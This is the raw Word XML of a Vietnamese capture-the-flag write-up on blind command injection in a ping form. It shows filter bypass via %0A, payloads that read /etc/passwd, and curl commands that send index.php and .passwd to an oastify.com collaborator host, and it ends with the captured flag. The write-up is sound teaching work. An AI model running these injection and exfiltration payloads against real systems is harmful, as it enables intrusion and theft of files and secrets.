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47BB3" w14:textId="54566E30" w:rsidR="00860F0A" w:rsidRDefault="00860F0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E7C72" w:rsidRPr="00860F0A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Đầu tiên, mình tìm hiểu lỗi trước.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3459D420" w14:textId="1BE2EA00" w:rsidR="001E7C72" w:rsidRPr="00860F0A" w:rsidRDefault="001E7C72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>payload:</w:t>
      </w:r>
      <w:r w:rsidR="00860F0A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidRPr="00860F0A">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">127.0.0.1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00860F0A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="00860F0A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ping ok</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3BE594" w14:textId="6D8D40B8" w:rsidR="001E7C72" w:rsidRDefault="001E7C72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>nó sẽ truy vấn đến hệ thống như sau: ping 127.0.0.1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF8BEE4" w14:textId="77777777" w:rsidR="00860F0A" w:rsidRPr="00860F0A" w:rsidRDefault="00860F0A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19C7CCD1" w14:textId="061EFAEE" w:rsidR="00860F0A" w:rsidRDefault="00860F0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E7C72" w:rsidRPr="00860F0A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Mình thử </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC73AFC" w14:textId="210938C8" w:rsidR="001E7C72" w:rsidRDefault="001E7C72">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00860F0A">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">127.0.0.1 &amp; cat /etc/passwd </w:t>
      </w:r>
      <w:r w:rsidRPr="00860F0A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="00860F0A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>syntax error.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D415BD" w14:textId="77777777" w:rsidR="00860F0A" w:rsidRPr="00860F0A" w:rsidRDefault="00860F0A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D883003" w14:textId="77777777" w:rsidR="001E7C72" w:rsidRPr="00860F0A" w:rsidRDefault="001E7C72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 xml:space="preserve">Bài toán thực sự bắt đầu. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093E540F" w14:textId="07C007F9" w:rsidR="001E7C72" w:rsidRPr="00860F0A" w:rsidRDefault="00860F0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r w:rsidR="001E7C72" w:rsidRPr="00860F0A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Mình thử ||,&amp;&amp;,&amp;  cx không được.</w:t>
      </w:r>
      <w:r w:rsidR="00760F9C" w:rsidRPr="00860F0A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Nó chặn &amp;,| rồi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C4E089" w14:textId="6CFE9872" w:rsidR="00760F9C" w:rsidRDefault="00760F9C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>Thử với %0A nhé.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2B4811" w14:textId="77777777" w:rsidR="00860F0A" w:rsidRPr="00860F0A" w:rsidRDefault="00860F0A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12F3D254" w14:textId="5D78C1B7" w:rsidR="00760F9C" w:rsidRDefault="00760F9C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 xml:space="preserve">Payload: </w:t>
      </w:r>
      <w:r w:rsidRPr="00860F0A">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>127.0.0.1%0Acat%20/etc/passwd</w:t>
      </w:r>
      <w:r w:rsidRPr="00860F0A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="00860F0A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Ping ok.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CAC67F6" w14:textId="77777777" w:rsidR="00860F0A" w:rsidRPr="00860F0A" w:rsidRDefault="00860F0A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C1AAF08" w14:textId="3882CA7C" w:rsidR="00760F9C" w:rsidRPr="00860F0A" w:rsidRDefault="00760F9C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 xml:space="preserve">Bypass thành công. Nhưng kết quả của câu lệnh không trả về cho người dùng. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9ED097" w14:textId="38BD58AC" w:rsidR="00760F9C" w:rsidRPr="00860F0A" w:rsidRDefault="00760F9C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sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="00860F0A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Blind command injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52FF9A92" w14:textId="3BC5552A" w:rsidR="00760F9C" w:rsidRPr="00860F0A" w:rsidRDefault="00760F9C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>Có 3 cách để xử lí:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6111CA" w14:textId="740B6427" w:rsidR="00760F9C" w:rsidRPr="00860F0A" w:rsidRDefault="00760F9C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>+ time based (nhưng bài toán xử lí bất đồng bộ)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740E1477" w14:textId="7D1D4A70" w:rsidR="00760F9C" w:rsidRDefault="00760F9C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 xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="00864AEF" w:rsidRPr="00860F0A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>redirect output (không tìm được mã nguồn có thể truy suất được)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67BDB77A" w14:textId="77777777" w:rsidR="00860F0A" w:rsidRPr="00860F0A" w:rsidRDefault="00860F0A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="746BA738" w14:textId="5FA8099A" w:rsidR="00864AEF" w:rsidRPr="00860F0A" w:rsidRDefault="00864AEF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 xml:space="preserve">Vậy cách còn lại là OAST kích hoạt sự tương tác mạng từ bên ngoài </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C853076" w14:textId="2813F06C" w:rsidR="00864AEF" w:rsidRPr="00860F0A" w:rsidRDefault="00864AEF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>Bạn có thể dùng burp collaborator client hay interactsh web client cx được.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E55E086" w14:textId="7F93454D" w:rsidR="00864AEF" w:rsidRPr="00860F0A" w:rsidRDefault="00864AEF">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FD69448" w14:textId="1FFB32C8" w:rsidR="00864AEF" w:rsidRPr="00860F0A" w:rsidRDefault="00864AEF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 xml:space="preserve">Domain là: </w:t>
      </w:r>
      <w:r w:rsidRPr="00860F0A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>y0z5mw6njo9o00v2tgjldo876yco0d.oastify.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D7EA71" w14:textId="4F9CB3BE" w:rsidR="00864AEF" w:rsidRPr="00860F0A" w:rsidRDefault="00864AEF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>Bài toán yêu cầu tìm flag trong file index.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DF4E23" w14:textId="77777777" w:rsidR="00864AEF" w:rsidRPr="00860F0A" w:rsidRDefault="00864AEF">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07626D71" w14:textId="44D9323E" w:rsidR="00864AEF" w:rsidRPr="00860F0A" w:rsidRDefault="00864AEF" w:rsidP="00864AEF">
      <w:pPr>
        <w:rPr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 xml:space="preserve">Bài post: </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="00864AEF">
          <w:rPr>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>H</w:t>
        </w:r>
        <w:r w:rsidRPr="00864AEF">
          <w:rPr>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>o</w:t>
        </w:r>
        <w:r w:rsidRPr="00864AEF">
          <w:rPr>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>w to send file contents as body entity using cURL</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00860F0A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B695A20" w14:textId="73B36326" w:rsidR="00864AEF" w:rsidRPr="00860F0A" w:rsidRDefault="00864AEF" w:rsidP="00864AEF">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="487DF90F" w14:textId="23C896E9" w:rsidR="00864AEF" w:rsidRPr="00860F0A" w:rsidRDefault="00864AEF" w:rsidP="0086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sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00864AEF">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>curl --data "@/path/to/filename" http://...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615226AF" w14:textId="27A2F0B3" w:rsidR="00864AEF" w:rsidRPr="00860F0A" w:rsidRDefault="00864AEF" w:rsidP="0086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sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30F8D6CC" w14:textId="17A89928" w:rsidR="00864AEF" w:rsidRPr="00860F0A" w:rsidRDefault="00864AEF" w:rsidP="0086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color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00860F0A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload: </w:t>
      </w:r>
      <w:r w:rsidR="003555DD" w:rsidRPr="00860F0A">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">127.0.0.1%0A curl  - -data “@index.php” </w:t>
      </w:r>
      <w:r w:rsidR="003555DD" w:rsidRPr="00860F0A">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>y0z5mw6njo9o00v2tgjldo876yco0d.oastify.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A085D43" w14:textId="6DEEA2FC" w:rsidR="00860F0A" w:rsidRPr="00860F0A" w:rsidRDefault="00860F0A" w:rsidP="0086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color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76EFA0F8" w14:textId="3EBB00C5" w:rsidR="00860F0A" w:rsidRPr="00864AEF" w:rsidRDefault="00860F0A" w:rsidP="00864A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195358" wp14:editId="68E58720">
            <wp:extent cx="4790661" cy="361830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3" t="17658" r="26903" b="6339"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4806270" cy="363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FADBA" w14:textId="7434A8D8" w:rsidR="00864AEF" w:rsidRDefault="00864AEF" w:rsidP="00864AEF">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="233E6B65" w14:textId="4E4FB3D5" w:rsidR="00860F0A" w:rsidRPr="00A65042" w:rsidRDefault="00860F0A" w:rsidP="00864AEF">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A65042">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Biến flag đọc file .passwd.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC43F48" w14:textId="77777777" w:rsidR="00A65042" w:rsidRPr="00A65042" w:rsidRDefault="00860F0A" w:rsidP="00A65042">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A65042">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B2D07D" w14:textId="0BCF3F35" w:rsidR="00860F0A" w:rsidRPr="00A65042" w:rsidRDefault="00A65042" w:rsidP="00A65042">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A65042">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">127.0.0.1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00A65042">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">%0A </w:t>
      </w:r>
      <w:r w:rsidRPr="00A65042">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>curl --data "@.passwd" yce5ywinvoloc0725gvlpok7iyopce.oastify.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B87D8B" w14:textId="48B4F432" w:rsidR="00A65042" w:rsidRDefault="00A65042" w:rsidP="00A65042">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6108EC91" w14:textId="4035DBEC" w:rsidR="00A65042" w:rsidRPr="00864AEF" w:rsidRDefault="00A65042" w:rsidP="00A65042">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A65042">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">flag: </w:t>
      </w:r>
      <w:r w:rsidRPr="00A65042">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Comma@nd_1nJec7ion_Fl@9_1337_Th3_G@m3!!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50DBEDBF" w14:textId="77777777" w:rsidR="00864AEF" w:rsidRDefault="00864AEF">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="617E2C99" w14:textId="77777777" w:rsidR="00864AEF" w:rsidRDefault="00864AEF">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31160C1A" w14:textId="77777777" w:rsidR="00864AEF" w:rsidRDefault="00864AEF">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F13636D" w14:textId="77777777" w:rsidR="00864AEF" w:rsidRPr="001E7C72" w:rsidRDefault="00864AEF">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00864AEF" w:rsidRPr="001E7C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5C7"/>
    <w:rsid w:val="001E7C72"/>
    <w:rsid w:val="002F49FE"/>
    <w:rsid w:val="003555DD"/>
    <w:rsid w:val="00760F9C"/>
    <w:rsid w:val="008415C7"/>
    <w:rsid w:val="00860F0A"/>
    <w:rsid w:val="00864AEF"/>
    <w:rsid w:val="00A65042"/>
    <w:rsid w:val="00B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8FB35E2"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{25AD88DC-5943-3B45-884A-B4480DA6B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4AE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64A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64AE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4A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4AE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64A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0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tackoverflow.com/questions/15912924/how-to-send-file-contents-as-body-entity-using-curl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2022-10-21T00:39:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-10-21T01:28:00Z</dcterms:modified>
</cp:coreProperties>
</file>